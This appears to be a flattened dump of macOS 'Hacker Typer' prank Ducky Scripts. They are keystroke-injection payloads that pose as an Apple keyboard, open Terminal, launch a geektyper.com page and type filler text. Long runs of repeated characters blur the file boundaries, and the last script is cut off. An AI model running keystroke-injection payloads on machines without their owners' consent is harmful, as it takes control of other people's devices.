qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuioqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuioppqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuioppqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop 88 | -------------------------------------------------------------------------------- /SD-Card/Ducky Script/Mac/Pranks/Hacker Typer Minecraft.txt: -------------------------------------------------------------------------------- 1 | REM Title: Hacker Typer Minecraft 2 | REM Author:UberGuidoZ & Narsty 3 | REM Target: MacOS 4 | REM Version: 1.0 5 | REM Category: Prank 6 | 7 | ID 05ac:021e Apple:Keyboard 8 | DELAY 1000 9 | GUI SPACE 10 | DELAY 200 11 | STRING terminal 12 | DELAY 1000 13 | ENTER 14 | DELAY 1000 15 | STRING open -a Safari 'https://geektyper.com/minecraft/' 16 | DELAY 1000 17 | ENTER 18 | DELAY 1000 19 | GUI-CTRL F 20 | DELAY 500 21 | STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop 22 | DELAY 500 23 | STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop 24 | DELAY 500 25 | STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop 26 | DELAY 1500 27 | RIGHTARROW 28 | DELAY 1500 29 | LEFTARROW 30 | DELAY 1500 31 | STRING 3 32 | DELAY 1500 33 | SHIFT 34 | DELAY 1500 35 | STRING 1 36 | DELAY 1500 37 | STRING 6 38 | DELAY 1500 39 | STRING 4 40 | DELAY 1500 41 | STRING 2 42 | DELAY 1500 43 | STRING 5 44 | DELAY 1500 45 | STRING 7 46 | DELAY 1500 47 | STRING 9 48 | DELAY 1500 49 | STRING 8 50 | DELAY 5000 51 | BACKSPACE 52 | DELAY 500 53 | STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop 54 | DELAY 500 55 | STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop 56 | DELAY 500 57 | STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop 58 | DELAY 500 59 | STRING 0 60 | DELAY 500 61 | STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop 62 | DELAY 500 63 | STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop 64 | DELAY 500 65 | STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop 66 | DELAY 500 67 | STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop 68 | DELAY 500 69 | STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop 70 | DELAY 500 71 | STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop 72 | UPARROW 73 | DELAY 500 74 | STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop 75 | DELAY 500 76 | STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop 77 | DELAY 500 78 | STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop 79 | DELAY 500 80 | STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop 81 | DELAY 500 82 | STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop 83 | DELAY 500 84 | STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop 85 | DELAY 5000 86 | ALT F4qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuioqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopH1642579qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop0qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuioqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuioppqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuioppqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop 87 | -------------------------------------------------------------------------------- /SD-Card/Ducky Script/Mac/Pranks/Hacker Typer NASA.txt: -------------------------------------------------------------------------------- 1 | REM Title: Hacker Typer Minecraft 2 | REM Author: UberGuidoZ & Narsty 3 | REM Target: MacOS 4 | REM Version: 1.0 5 | REM Category: Prank 6 | 7 | 8 | ID 05ac:021e Apple:Keyboard 9 | DELAY 1000 10 | GUI SPACE 11 | DELAY 200 12 | STRING terminal 13 | DELAY 1000 14 | ENTER 15 | DELAY 1000 16 | STRING open -a Safari 'https://geektyper.com/nasa/' 17 | DELAY 1000 18 | ENTER 19 | DELAY 1000 20 | GUI-CTRL F 21 | DELAY 500 22 | STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop 23 | DELAY 500 24 | STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop 25 | DELAY 500 26 | STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop 27 | DELAY 1500 28 | RIGHTARROW 29 | DELAY 1500 30 | LEFTARROW 31 | DELAY 1500 32 | STRING 3 33 | DELAY 1500 34 | SHIFT 35 | DELAY 1500 36 | STRING 1 37 | DELAY 1500 38 | STRING 6 39 | DELAY 1500 40 | STRING 4 41 | DELAY 1500 42 | STRING 2 43 | DELAY 1500 44 | STRING 5 45 | DELAY 1500 46 | STRING 7 47 | DELAY 1500 48 | STRING 9 49 | DELAY 1500 50 | STRING 8 51 | DELAY 5000 52 | BACKSPACE 53 | DELAY 500 54 | STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop 55 | DELAY 500 56 | STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop 57 | DELAY 500 58 | STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop 59 | DELAY 500 60 | STRING 0 61 | DELAY 500 62 | STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop 63 | DELAY 500 64 | STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop 65 | DELAY 500 66 | STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop 67 | DELAY 500 68 | STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop 69 | DELAY 500 70 | STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop 71 | DELAY 500 72 | STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop 73 | UPARROW 74 | DELAY 500 75 | STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop 76 | DELAY 500 77 | STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop 78 | DELAY 500 79 | STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop 80 | DELAY 500 81 | STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop 82 | DELAY 500 83 | STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop 84 | DELAY 500 85 | STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop 86 | DELAY 5000 87 | ALT F4qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuioqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopH1642579qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop0qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuioqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuioppqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuioppqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop 88 | -------------------------------------------------------------------------------- /SD-Card/Ducky Script/Mac/Pranks/Hacker Typer Tegnio.txt: -------------------------------------------------------------------------------- 1 | REM Title: Hacker Typer Tegnio 2 | REM Author: UberGuidoZ & Narsty 3 | REM Target: MacOS 4 | REM Version: 1.0 5 | REM Category: Prank 6 | 7 | ID 05ac:021e Apple:Keyboard 8 | DELAY 1000 9 | GUI SPACE 10 | DELAY 200 11 | STRING terminal 12 | DELAY 1000 13 | ENTER 14 | DELAY 1000 15 | STRING open -a Safari 'https://geektyper.com/tegnio/' 16 | DELAY 1000 17 | ENTER 18 | DELAY 1000 19 | GUI-CTRL F 20 | DELAY 500 21 | STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop 22 | DELAY 500 23 | STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop 24 | DELAY 500 25 | STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop 26 | DELAY 1500 27 | RIGHTARROW 28 | DELAY 1500 29 | LEFTARROW 30 | DELAY 1500 31 | STRING 3 32 | DELAY 1500 33 | SHIFT 34 | DELAY 1500 35 | STRING 1 36 | DELAY 1500 37 | STRING 6 38 | DELAY 1500 39 | STRING 4 40 | DELAY 1500 41 | STRING 2 42 | DELAY 1500 43 | STRING 5 44 | DELAY 1500 45 | STRING 7 46 | DELAY 1500 47 | STRING 9 48 | DELAY 1500 49 | STRING 8 50 | DELAY 5000 51 | BACKSPACE 52 | DELAY 500 53 | STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop 54 | DELAY 500 55 | STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop 56 | DELAY 500 57 | STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop 58 | DELAY 500 59 | STRING 0 60 | DELAY 500 61 | STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop 62 | DELAY 500 63 | STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop 64 | DELAY 500 65 | STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop 66 | DELAY 500 67 | STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop 68 | DELAY 500 69 | STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop 70 | DELAY 500 71 | STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop 72 | UPARROW 73 | DELAY 500 74 | STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop 75 | DELAY 500 76 | STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop 77 | DELAY 500 78 | STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop 79 | DELAY 500 80 | STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop 81 | DELAY 500 82 | STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop 83 | DELAY 500 84 | STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop 85 | DELAY 5000 86 | ALT F4qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuioqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopH1642579qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop0qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuioqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuioppqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuioppqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop 87 | -------------------------------------------------------------------------------- /SD-Card/Ducky Script/Mac/Pranks/Hacker Typer Umbrella.txt: -------------------------------------------------------------------------------- 1 | REM Title: Hacker Typer Umbrella 2 | REM Author: UberGuidoZ & Narsty 3 | REM Target: MacOS 4 | REM Version: 1.0 5 | REM Category: Prank 6 | 7 | 8 | ID 05ac:021e Apple:Keyboard 9 | DELAY 1000 10 | GUI SPACE 11 | DELAY 200 12 | STRING terminal 13 | DELAY 1000 14 | ENTER 15 | DELAY 1000 16 | STRING open -a Safari 'https://geektyper.com/umbrella/' 17 | DELAY 1000 18 | ENTER 19 | DELAY 1000 20 | GUI-CTRL F 21 | DELAY 500 22 | STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop 23 | DELAY 500 24 | STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop 25 | DELAY 500 26 | STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop 27 | DELAY 1500 28 | RIGHTARROW 29 | DELAY 1500 30 | LEFTARROW 31 | DELAY 1500 32 | STRING 3 33 | DELAY 1500 34 | SHIFT 35 | DELAY 1500 36 | STRING 1 37 | DELAY 1500 38 | STRING 6 39 | DELAY 1500 40 | STRING 4 41 | DELAY 1500 42 | STRING 2 43 | DELAY 1500 44 | STRING 5 45 | DELAY 1500 46 | STRING 7 47 | DELAY 1500 48 | STRING 9 49 | DELAY 1500 50 | STRING 8 51 | DELAY 5000 52 | BACKSPACE 53 | DELAY 500 54 | STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop 55 | DELAY 500 56 | STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop 57 | DELAY 500 58 | STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop 59 | DELAY 500 60 | STRING 0 61 | DELAY 500 62 | STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop 63 | DELAY 500 64 | STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop 65 | DELAY 500 66 | STRING 